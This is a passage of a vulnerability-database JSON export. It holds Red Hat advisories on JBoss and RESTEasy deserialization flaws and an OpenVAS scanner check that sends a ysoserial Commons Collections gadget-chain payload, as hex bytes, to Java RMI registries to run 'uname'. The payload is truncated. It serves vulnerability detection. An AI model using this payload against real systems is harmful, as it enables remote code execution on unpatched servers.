"AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-12T04:37:38", "description": "Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server.\n\nThis asynchronous patch is a security update for JBoss invoker in Red Hat JBoss Enterprise Application Platform 5.2.0.\n\nSecurity Fix(es):\n\n* jbossas: Arbitrary code execution via unrestricted deserialization in ReadOnlyAccessFilter of HTTP Invoker. (CVE-2017-12149)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Joao F M Figueiredo for reporting this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-17T18:11:20", "type": "redhat", "title": "(RHSA-2018:1607) Critical: Red Hat JBoss Enterprise Application Platform 5.2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149"], "modified": "2018-06-06T22:37:45", "id": "RHSA-2018:1607", "href": "https://access.redhat.com/errata/RHSA-2018:1607", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-12T04:37:38", "description": "Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server.\n\nThis asynchronous patch is a security update for JBoss invoker in Red Hat JBoss Enterprise Application Platform 5.2.0.\n\nSecurity Fix(es):\n\n* jbossas: Arbitrary code execution via unrestricted deserialization in ReadOnlyAccessFilter of HTTP Invoker. (CVE-2017-12149)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Joao F M Figueiredo for reporting this issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-17T18:15:33", "type": "redhat", "title": "(RHSA-2018:1608) Critical: Red Hat JBoss Enterprise Application Platform 5.2 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12149"], "modified": "2018-05-17T18:16:03", "id": "RHSA-2018:1608", "href": "https://access.redhat.com/errata/RHSA-2018:1608", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-27T10:24:22", "description": "The jboss-ec2-eap packages provide scripts for Red Hat JBoss Enterprise Application Platform running on the Amazon Web Services (AWS) Elastic Compute Cloud (EC2).\n\nWith this update, the jboss-ec2-eap package has been updated to ensure compatibility with Red Hat JBoss Enterprise Application Platform 6.4.15.\n\nSecurity Fix(es):\n\n* It was discovered that under certain conditions RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker could possibly use this flaw execute arbitrary code with the permissions of the application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting these issues.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-18T21:31:12", "type": "redhat", "title": "(RHSA-2017:1260) Moderate: jboss-ec2-eap security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2018-06-06T22:39:07", "id": "RHSA-2017:1260", "href": "https://access.redhat.com/errata/RHSA-2017:1260", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-04T12:29:22", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.14, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* It was discovered that under certain conditions RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker could possibly use this flaw execute arbitrary code with the permissions of the application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting these issues.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-18T20:48:16", "type": "redhat", "title": "(RHSA-2017:1253) Moderate: Red Hat JBoss Enterprise Application Platform 6.4.15 update on RHEL 7", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2018-03-19T12:13:49", "id": "RHSA-2017:1253", "href": "https://access.redhat.com/errata/RHSA-2017:1253", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-04T12:29:22", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.14, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* It was discovered that under certain conditions RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker could possibly use this flaw execute arbitrary code with the permissions of the application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting these issues.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-18T21:21:25", "type": "redhat", "title": "(RHSA-2017:1255) Moderate: Red Hat JBoss Enterprise Application Platform security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2017-07-24T20:07:31", "id": "RHSA-2017:1255", "href": "https://access.redhat.com/errata/RHSA-2017:1255", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T16:21:59", "description": "Red Hat Decision Manager is an open source decision management platform that combines business rules management, complex event processing, Decision Model & Notation (DMN) execution, and Business Optimizer for solving planning problems. It automates business decisions and makes that logic available to the entire business. \n\nThis release of Red Hat Decision Manager 7.1.0 serves as an update to Red Hat Decision Manager 7.0.1, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* Resteasy: Yaml unmarshalling vulnerable to RCE (CVE-2016-9606)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting CVE-2016-9606.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-11T14:17:21", "type": "redhat", "title": "(RHSA-2018:2913) Moderate: Red Hat Decision Manager 7.1.0 bug fix and security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2018-10-11T14:17:57", "id": "RHSA-2018:2913", "href": "https://access.redhat.com/errata/RHSA-2018:2913", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-04T12:29:22", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.14, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* It was discovered that under certain conditions RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker could possibly use this flaw execute arbitrary code with the permissions of the application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting these issues.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-18T21:00:29", "type": "redhat", "title": "(RHSA-2017:1256) Moderate: Red Hat JBoss Enterprise Application Platform 6.4.15 update on RHEL 5", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2017-05-18T21:03:55", "id": "RHSA-2017:1256", "href": "https://access.redhat.com/errata/RHSA-2017:1256", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-04T12:29:22", "description": "Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.14, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* It was discovered that under certain conditions RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker could possibly use this flaw execute arbitrary code with the permissions of the application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting these issues.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-05-18T20:36:30", "type": "redhat", "title": "(RHSA-2017:1254) Moderate: Red Hat JBoss Enterprise Application Platform 6.4.15 update on RHEL 6", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9606"], "modified": "2018-06-06T22:39:06", "id": "RHSA-2017:1254", "href": "https://access.redhat.com/errata/RHSA-2017:1254", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:35:45", "description": "The remote host is affected by a remote code execution vulnerability", "cvss3": {}, "published": "2016-06-15T00:00:00", "type": "openvas", "title": "RMI Java Deserialization Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3642", "CVE-2016-1487"], "modified": "2018-10-18T00:00:00", "id": "OPENVAS:1361412562310105765", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105765", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_rmi_service_java_deserialization.nasl 11961 2018-10-18 10:49:40Z asteins $\n#\n# RMI Java Deserialization Remote Code Execution Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105765\");\n script_version(\"$Revision: 11961 $\");\n script_cve_id(\"CVE-2016-3642\", \"CVE-2016-1487\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_name(\"RMI Java Deserialization Remote Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/576313\");\n\n script_tag(name:\"vuldetect\", value:\"Execute the `uname' command and check the response.\");\n script_tag(name:\"insight\", value:\"The Apache Commons Collections (ACC) library is vulnerable to insecure deserialization of data, which may result in arbitrary code execution. Java applications that either directly use ACC, or contain ACC in their classpath, may be vulnerable to arbitrary code execution.\");\n script_tag(name:\"solution\", value:\"Ask the vendor for an update/workaround\");\n script_tag(name:\"summary\", value:\"The remote host is affected by a remote code execution vulnerability\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_active\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-18 12:49:40 +0200 (Thu, 18 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-15 20:26:27 +0200 (Wed, 15 Jun 2016)\");\n script_category(ACT_ATTACK);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_rmi_registry_detect.nasl\");\n script_require_ports(\"Services/rmi_registry\");\n\n exit(0);\n}\n\ninclude(\"byte_func.inc\");\n\nif( ! port = get_kb_item(\"Services/rmi_registry\") ) exit( 0 );\n\nsoc = open_sock_tcp( port );\n\nif( ! soc ) exit( 0 );\n\nreq = 'JRMI' + raw_string( 0x00, 0x02, 0x4b );\n\nsend(socket:soc, data:req);\nres = recv( socket:soc, length:128, min:7 );\n\nif( hexstr( res[0] ) != '4e' || ( getword( blob:res, pos:1 ) + 7 ) != strlen( res ) )\n{\n close( soc );\n exit( 0 );\n}\n\n# java -cp ysoserial-0.0.2-all.jar ysoserial.RMIRegistryExploit 192.168.2.44 1099 CommonsCollections1 'uname'\nreq = raw_string( 0x00, 0x09, 0x31, 0x32, 0x37, 0x2e, 0x30, 0x2e,\n 0x30, 0x2e, 0x32, 0x00, 0x00, 0x00, 0x00,\n 0x50, 0xac, 0xed, 0x00, 0x05, 0x77, 0x22, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x44, 0x15, 0x4d, 0xc9, 0xd4, 0xe6, 0x3b,\n 0xdf, 0x74, 0x00, 0x05, 0x70, 0x77, 0x6e, 0x65,\n 0x64, 0x73, 0x7d, 0x00, 0x00, 0x00, 0x01, 0x00,\n 0x0f, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x72, 0x6d,\n 0x69, 0x2e, 0x52, 0x65, 0x6d, 0x6f, 0x74, 0x65,\n 0x70, 0x78, 0x72, 0x00, 0x17, 0x6a, 0x61, 0x76,\n 0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67, 0x2e, 0x72,\n 0x65, 0x66, 0x6c, 0x65, 0x63, 0x74, 0x2e, 0x50,\n 0x72, 0x6f, 0x78, 0x79, 0xe1, 0x27, 0xda, 0x20,\n 0xcc, 0x10, 0x43, 0xcb, 0x02, 0x00, 0x01, 0x4c,\n 0x00, 0x01, 0x68, 0x74, 0x00, 0x25, 0x4c, 0x6a,\n 0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e, 0x67,\n 0x2f, 0x72, 0x65, 0x66, 0x6c, 0x65, 0x63, 0x74,\n 0x2f, 0x49, 0x6e, 0x76, 0x6f, 0x63, 0x61, 0x74,\n 0x69, 0x6f, 0x6e, 0x48, 0x61, 0x6e, 0x64, 0x6c,\n 0x65, 0x72, 0x3b, 0x70, 0x78, 0x70, 0x73, 0x72,\n 0x00, 0x32, 0x73, 0x75, 0x6e, 0x2e, 0x72, 0x65,\n 0x66, 0x6c, 0x65, 0x63, 0x74, 0x2e, 0x61, 0x6e,\n 0x6e, 0x6f, 0x74, 0x61, 0x74, 0x69, 0x6f, 0x6e,\n 0x2e, 0x41, 0x6e, 0x6e, 0x6f, 0x74, 0x61, 0x74,\n 0x69, 0x6f, 0x6e, 0x49, 0x6e, 0x76, 0x6f, 0x63,\n 0x61, 0x74, 0x69, 0x6f, 0x6e, 0x48, 0x61, 0x6e,\n 0x64, 0x6c, 0x65, 0x72, 0x55, 0xca, 0xf5, 0x0f,\n 0x15, 0xcb, 0x7e, 0xa5, 0x02, 0x00, 0x02, 0x4c,\n 0x00, 0x0c, 0x6d, 0x65, 0x6d, 0x62, 0x65, 0x72,\n 0x56, 0x61, 0x6c, 0x75, 0x65, 0x73, 0x74, 0x00,\n 0x0f, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x75,\n 0x74, 0x69, 0x6c, 0x2f, 0x4d, 0x61, 0x70, 0x3b,\n 0x4c, 0x00, 0x04, 0x74, 0x79, 0x70, 0x65, 0x74,\n 0x00, 0x11, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f,\n 0x6c, 0x61, 0x6e, 0x67, 0x2f, 0x43, 0x6c, 0x61,\n 0x73, 0x73, 0x3b, 0x70, 0x78, 0x70, 0x73, 0x72,\n 0x00, 0x11, 0x6a, 0x61, 0x76, 0x61, 0x2e, 0x75,\n 0x74, 0x69, 0x6c, 0x2e, 0x48, 0x61, 0x73, 0x68,\n 0x4d, 0x61, 0x70, 0x05, 0x07, 0xda, 0xc1, 0xc3,\n 0x16, 0x60, 0xd1, 0x03, 0x00, 0x02, 0x46, 0x00,\n 0x0a, 0x6c, 0x6f, 0x61, 0x64, 0x46, 0x61, 0x63,\n 0x74, 0x6f, 0x72, 0x49, 0x00, 0x09, 0x74, 0x68,\n 0x72, 0x65, 0x73, 0x68, 0x6f, 0x6c, 0x64, 0x70,\n 0x78, 0x70, 0x3f, 0x40, 0x00, 0x00, 0x00, 0x00,\n 0x00, 0x0c, 0x77, 0x08, 0x00, 0x00, 0x00, 0x10,\n 0x00, 0x00, 0x00, 0x01, 0x71, 0x00, 0x7e, 0x00,\n 0x00, 0x73, 0x71, 0x00, 0x7e, 0x00, 0x05, 0x73,\n 0x7d, 0x00, 0x00, 0x00, 0x01, 0x00, 0x0d, 0x6a,\n 0x61, 0x76, 0x61, 0x2e, 0x75, 0x74, 0x69, 0x6c,\n 0x2e, 0x4d, 0x61, 0x70, 0x70, 0x78, 0x71, 0x00,\n 0x7e, 0x00, 0x02, 0x73, 0x71, 0x00, 0x7e, 0x00,\n 0x05, 0x73, 0x72, 0x00, 0x2a, 0x6f, 0x72, 0x67,\n 0x2e, 0x61, 0x70, 0x61, 0x63, 0x68, 0x65, 0x2e,\n 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x73, 0x2e,\n 0x63, 0x6f, 0x6c, 0x6c, 0x65, 0x63, 0x74, 0x69,\n 0x6f, 0x6e, 0x73, 0x2e, 0x6d, 0x61, 0x70, 0x2e,\n 0x4c, 0x61, 0x7a, 0x79, 0x4d, 0x61, 0x70, 0x6e,\n 0xe5, 0x94, 0x82, 0x9e, 0x79, 0x10, 0x94, 0x03,\n 0x00, 0x01, 0x4c, 0x00, 0x07, 0x66, 0x61, 0x63,\n 0x74, 0x6f, 0x72, 0x79, 0x74, 0x00, 0x2c, 0x4c,\n 0x6f, 0x72, 0x67, 0x2f, 0x61, 0x70, 0x61, 0x63,\n 0x68, 0x65, 0x2f, 0x63, 0x6f, 0x6d, 0x6d, 0x6f,\n 0x6e, 0x73, 0x2f, 0x63, 0x6f, 0x6c, 0x6c, 0x65,\n 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x2f, 0x54,\n 0x72, 0x61, 0x6e, 0x73, 0x66, 0x6f, 0x72, 0x6d,\n 0x65, 0x72, 0x3b, 0x70, 0x78, 0x70, 0x73, 0x72,\n 0x00, 0x3a, 0x6f, 0x72, 0x67, 0x2e, 0x61, 0x70,\n 0x61, 0x63, 0x68, 0x65, 0x2e, 0x63, 0x6f, 0x6d,\n 0x6d, 0x6f, 0x6e, 0x73, 0x2e, 0x63, 0x6f, 0x6c,\n 0x6c, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73,\n 0x2e, 0x66, 0x75, 0x6e, 0x63, 0x74, 0x6f, 0x72,\n 0x73, 0x2e, 0x43, 0x68, 0x61, 0x69, 0x6e, 0x65,\n 0x64, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x66, 0x6f,\n 0x72, 0x6d, 0x65, 0x72, 0x30, 0xc7, 0x97, 0xec,\n 0x28, 0x7a, 0x97, 0x04, 0x02, 0x00, 0x01, 0x5b,\n 0x00, 0x0d, 0x69, 0x54, 0x72, 0x61, 0x6e, 0x73,\n 0x66, 0x6f, 0x72, 0x6d, 0x65, 0x72, 0x73, 0x74,\n 0x00, 0x2d, 0x5b, 0x4c, 0x6f, 0x72, 0x67, 0x2f,\n 0x61, 0x70, 0x61, 0x63, 0x68, 0x65, 0x2f, 0x63,\n 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x73, 0x2f, 0x63,\n 0x6f, 0x6c, 0x6c, 0x65, 0x63, 0x74, 0x69, 0x6f,\n 0x6e, 0x73, 0x2f, 0x54, 0x72, 0x61, 0x6e, 0x73,\n 0x66, 0x6f, 0x72, 0x6d, 0x65, 0x72, 0x3b, 0x70,\n 0x78, 0x70, 0x75, 0x72, 0x00, 0x2d, 0x5b, 0x4c,\n 0x6f, 0x72, 0x67, 0x2e, 0x61, 0x70, 0x61, 0x63,\n 0x68, 0x65, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f,\n 0x6e, 0x73, 0x2e, 0x63, 0x6f, 0x6c, 0x6c, 0x65,\n 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x2e, 0x54,\n 0x72, 0x61, 0x6e, 0x73, 0x66, 0x6f, 0x72, 0x6d,\n 0x65, 0x72, 0x3b, 0xbd, 0x56, 0x2a, 0xf1, 0xd8,\n 0x34, 0x18, 0x99, 0x02, 0x00, 0x00, 0x70, 0x78,\n 0x70, 0x00, 0x00, 0x00, 0x05, 0x73, 0x72, 0x00,\n 0x3b, 0x6f, 0x72, 0x67, 0x2e, 0x61, 0x70, 0x61,\n 0x63, 0x68, 0x65, 0x2e, 0x63, 0x6f, 0x6d, 0x6d,\n 0x6f, 0x6e, 0x73, 0x2e, 0x63, 0x6f, 0x6c, 0x6c,\n 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x73, 0x2e,\n 0x66, 0x75, 0x6e, 0x63, 0x74, 0x6f, 0x72, 0x73,\n 0x2e, 0x43, 0x6f, 0x6e, 0x73, 0x74, 0x61, 0x6e,\n 0x74, 0x54, 0x72, 0x61, 0x6e, 0x73, 0x66, 0x6f,\n 0x72, 0x6d, 0x65, 0x72, 0x58, 0x76, 0x90, 0x11,\n 0x41, 0x02, 0xb1, 0x94, 0x02, 0x00, 0x01, 0x4c,\n 0x00, 0x09, 0x69, 0x43, 0x6f, 0x6e, 0x73, 0x74,\n 0x61, 0x6e, 0x74, 0x74, 0x00, 0x12, 0x4c, 0x6a,\n 0x61, 0x76, 0x61, 0x2f, 0x6c, 0x61, 0x6e, 0x67,\n 0x2f, 0x4f, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x3b,\n 0x70, 0x78, 0x70, 0x76, 0x72, 0x00, 0x11, 0x6a,\n 0x61, 0x76, 0x61, 0x2e, 0x6c, 0x61, 0x6e, 0x67,\n 0x2e, 0x52, 0x75, 0x6e, 